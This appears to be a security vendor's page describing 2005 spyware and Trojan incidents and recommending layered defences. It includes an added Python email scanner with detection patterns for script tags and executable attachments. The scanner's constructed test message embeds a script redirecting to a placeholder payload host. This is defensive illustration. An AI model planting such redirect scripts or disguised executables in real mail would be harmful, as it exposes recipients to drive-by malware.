Real-world Spyware Attacks  

Recent examples of real-world spyware attacks indicate that the spyware threat is increasing in sophistication and prevalence. Clearly, there is much more to spyware than pop-up ads and browser redirects.

International Identity Theft Ring (August 2005)

An international identity theft ring that uses spyware to steal confidential personal information was unearthed in August. Credit card details, Social Security numbers, usernames, passwords, and other private information for an estimated 27,000 customers of over 50 international financial institutions were found. The criminal group captured this sensitive personal data through web-based Trojan horses that contained keylogger and backdoor spy programs. A computer user who visited the spyware-hosting website, perhaps as a result of a browser redirect or phishing email, would be attacked with an automatic drive-by download that installed Trojan horse and backdoor spyware.

UK Critical National Infrastructure (June 2005)

In June, the UK's National Infrastructure Security Co-ordination Centre announced that the British critical national infrastructure had been bombarded for several months with sophisticated, industrial-strength Trojan horse attacks. The attacks targeted specific individuals privy to commercially or economically sensitive information at over 300 key government, financial, transport, telecommunications, military, health, and energy organizations. The Trojan horse and backdoor spyware arrived through email and through websites that phishing email recipients were deceived into visiting. Once installed, the spyware programs collected user names, passwords, and system information; scanned drives; and uploaded documents and data to remote computers.

Israeli Corporate Espionage (May 2005)

The Israeli corporate scene was scandalized in May with news of the biggest case of industrial espionage in Israel's history. Police arrested the senior executives of 15 leading corporations and the private investigators they had allegedly employed for using Trojan horse spyware that stole tens of thousands of confidential documents from target companies. The Trojan horse and backdoor spyware attacked via email and CD-ROMs sent by regular mail and allowed a person to control a computer, make changes to its programs, monitor everything it contained, and send documents and pictures to FTP file-storage servers in Israel and overseas.

Eyeveg Spyware Worm (May 2005)

The Eyeveg worm demonstrates that even traditional viruses and worms may be repurposed with spyware capabilities. The spyware worm is embedded in an HTML attachment of an email and activates when the HTML renders. It drops a Trojan horse keylogger that loads into web browsers and captures form data before the browser encrypts it for SSL servers, so the encrypted connection offers no protection against it. The Trojan horse also includes a backdoor program that can upload and download files; copy, delete, find, and start files; and retrieve system information. As with traditional worms, Eyeveg seeks to propagate itself, in this case by harvesting email addresses from the infected computer and emailing itself to more computers.

Sumitomo Mitsui Bank (March 2005)

In March, British police foiled a plot involving spyware to steal £220 million from Sumitomo Mitsui Bank in London. Cybercriminals targeted the bank's computer systems and secretly deployed a keylogger program, perhaps part of a Trojan horse, to capture passwords and access funds for electronic transfer. A man in Israel was arrested after allegedly trying to transfer £13.9 million into an Israeli account.

Spyware Prevention and Best Practices

These spyware cases provide real-world data for the development of anti-spyware best practices. All the cases involved spyware that truly spied on computers to steal sensitive information, namely Trojan horse and backdoor spyware. These spy programs reached their targets through both web and email traffic. The above cases also highlight that spyware attacks are becoming increasingly creative and sophisticated. Attacks may use browser redirects and phishing email to bring their targets to websites that then deploy spyware via web traffic. Spyware may also propagate widely when it is used in combination with worms and traditional email-borne viruses. Thus, spyware is not a standalone threat - it is often deployed as part of a blended attack involving other types of malware.

These cases indicate that anti-spyware best practices should include the following:

Cover both desktop computers and the internet gateway in a layered defense
Cover web, email, and other internet traffic
Cover the full spectrum of spyware and malware
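The email-borne cases above (the Eyeveg HTML attachment, and the Trojan horses that arrived by email in the Israeli and UK cases) and the practice of inspecting email traffic at the internet gateway can be illustrated with a small attachment-inspection routine. The following is an added example written for this page; it is not code from CP Secure or from any product the page describes. The message it scans is constructed inline, the domain names are placeholders, and the signature list is illustrative rather than complete.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Markup that lets an HTML part run code or pull remote content as soon as it renders.
ACTIVE_CONTENT = re.compile(
    rb"<\s*(script|object|embed|iframe|applet)\b|javascript:|vbscript:|on(load|error|click)\s*=",
    re.IGNORECASE,
)

# Attachment name suffixes that an external sender has no business delivering (illustrative list).
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta")


def scan_message(raw: bytes) -> list:
    """Return (part name, reason) findings for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue  # multipart containers carry no payload of their own
        filename = part.get_filename() or ""
        ctype = part.get_content_type()
        payload = part.get_payload(decode=True) or b""
        name = filename.lower()

        # Eyeveg-style delivery: HTML that executes when the mail client renders it.
        if ctype == "text/html" or name.endswith((".htm", ".html")):
            hit = ACTIVE_CONTENT.search(payload)
            if hit:
                findings.append((filename or "(inline body)",
                                 "active HTML content: " + hit.group(0).decode(errors="replace")))

        # Executable by name, including double-extension disguises such as "statement.pdf.exe".
        if name.endswith(EXECUTABLE_EXT):
            findings.append((filename, "executable attachment"))

        # Executable by content: a PE file keeps its MZ header whatever it is renamed to.
        if payload[:2] == b"MZ":
            findings.append((filename or ctype, "PE executable by magic bytes"))
    return findings


def build_sample(malicious: bool = True) -> bytes:
    """Constructed sample mail (not a real capture). With malicious=True it carries an
    HTML attachment containing script and a renamed executable stub."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"      # placeholder addresses
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Your statement"
    msg.set_content("Please see the attached statement.")
    if malicious:
        html = ("<html><body>Statement<script>"
                "document.location='http://payload.example.invalid/';"  # placeholder host
                "</script></body></html>")
        msg.add_attachment(html, subtype="html", filename="statement.html")
        stub = b"MZ" + b"\x00" * 62  # DOS header magic only, not a runnable program
        msg.add_attachment(stub, maintype="application", subtype="octet-stream",
                           filename="statement.pdf.exe")
    else:
        msg.add_attachment("Balance: 0.00", subtype="plain", filename="statement.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for part_name, reason in scan_message(build_sample()):
        print(f"BLOCK {part_name}: {reason}")
```

The name-based check alone is weak, since an attacker controls the filename; the magic-byte check catches a renamed executable regardless of what it is called, and the HTML check catches the render-time vector even when the file carries no suspicious name at all. A production gateway would additionally open archives, recurse into nested message/rfc822 parts, and apply the same content checks to files fetched over HTTP, which is the "cover web, email, and other internet traffic" point above.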
Copyright © 2007 CP Secure, Inc. All rights reserved.